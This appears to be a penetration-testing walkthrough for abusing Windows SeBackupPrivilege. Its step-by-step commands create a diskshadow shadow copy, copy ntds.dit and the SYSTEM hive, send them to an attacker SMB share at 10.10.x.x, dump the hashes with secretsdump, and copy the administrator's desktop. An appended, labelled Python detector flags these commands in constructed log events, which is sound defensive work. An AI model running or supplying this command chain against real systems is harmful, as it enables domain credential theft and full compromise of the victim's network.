If you have SeBackupPrivilege, you can use that privilege to read and copy any file from the target machine. If we go after important files such as SAM, SYSTEM or ntds.dit, we can become SYSTEM.
First upload SeBackupPrivilegeCmdLets.dll and SeBackupPrivilegeUtils.dll to the target machine.
import-module .\SeBackupPrivilegeCmdLets.dll
import-module .\SeBackupPrivilegeUtils.dll

set context persistent nowriters
set metadata c:\\programdata\\test.cab
set verbose on
add volume c: alias test
create
expose %test% z:

NOTE: c:\programdata is the writable path where I have uploaded the DLLs and am creating test.cab.

unix2dos vss.dsh

Upload the file to C:\programdata.

diskshadow /s c:\\programdata\\vss.dsh

Copy any file to the present directory and then download it to your system.
We are going to get ntds.dit and SYSTEM.

Copy-FileSeBackupPrivilege z:\\Windows\\ntds\\ntds.dit c:\\programdata\\ntds.dit

Now the SYSTEM file:

reg save HKLM\SYSTEM C:\\programdata\\SYSTEM

Now we can see that both the ntds.dit and SYSTEM files are in our present directory. You can also get other sensitive files like SAM, SYSTEM, SECURITY.

smbserver.py k4sth4 . -smb2support -username kt -password kt
net use \\10.10.x.x\k4sth4 /u:kt kt
Copy-FileSeBackupPrivilege z:\\Windows\\ntds\\ntds.dit \\10.10.x.x\k4sth4\ntds.dit
reg.exe save hklm\system \\10.10.x.x\system

secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

robocopy /b C:\\users\\administrator\\desktop C:\\programdata\\temp

This gets us all the desktop files in the temp directory.

set context persistent nowriters
set metadata c:\\programdata\\test.cab
set verbose on
delete shadows volume test
reset

unix2dos vss.dsh
diskshadow /s c:\\programdata\\vss.dsh
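
From the defender's side, every command on this page appears in process-creation or PowerShell script-block logs on the target. The following is an added example, not part of the original post: a Python detector run over constructed command lines, where the rule names, host names and sample events are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Rule names are illustrative; patterns come only from the commands shown on this page.
RULES = {
    "diskshadow_script": re.compile(r"\bdiskshadow(\.exe)?\s+/s\b", re.I),
    "reg_save_hive": re.compile(r"\breg(\.exe)?\s+save\s+hklm\\+(sam|system|security)\b", re.I),
    "robocopy_backup_mode": re.compile(r"\brobocopy(\.exe)?\b.*\s/b(\s|$)", re.I),
    "sebackup_module": re.compile(r"Copy-FileSeBackupPrivilege|SeBackupPrivilege(CmdLets|Utils)\.dll", re.I),
    "ntds_dit_access": re.compile(r"\\ntds\.dit\b", re.I),
}

EVENTS = [  # constructed sample data (hosts and events are not from the page)
    {"host": "DC01", "cmd": r"diskshadow /s c:\programdata\vss.dsh"},
    {"host": "DC01", "cmd": r"powershell Copy-FileSeBackupPrivilege z:\Windows\ntds\ntds.dit c:\programdata\ntds.dit"},
    {"host": "DC01", "cmd": r"reg save HKLM\SYSTEM C:\programdata\SYSTEM"},
    {"host": "FS02", "cmd": r"robocopy /b C:\users\administrator\desktop C:\programdata\temp"},
    {"host": "WS07", "cmd": r"reg query HKLM\SYSTEM\CurrentControlSet\Control"},
    {"host": "WS07", "cmd": r"robocopy C:\data D:\backup /mir"},
]

def match_rules(cmd):
    """Return the sorted rule names that fire on one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmd))

def triage(events):
    """Group hits per host. A host is 'critical' when it shows both a
    diskshadow script run and a hive save or ntds.dit access, else 'review'."""
    seen = defaultdict(set)
    for ev in events:
        seen[ev["host"]].update(match_rules(ev["cmd"]))
    verdicts = {}
    for host, hits in seen.items():
        if not hits:
            continue  # nothing matched on this host
        shadow = "diskshadow_script" in hits
        cred_files = hits & {"reg_save_hive", "ntds_dit_access"}
        severity = "critical" if shadow and cred_files else "review"
        verdicts[host] = (severity, sorted(hits))
    return verdicts

if __name__ == "__main__":
    for host, (severity, rules) in triage(EVENTS).items():
        print(f"{host}: {severity} {rules}")
```

Alerts of this kind are most useful when joined with the account's group membership, since SeBackupPrivilege is normally held only by backup operators and administrators.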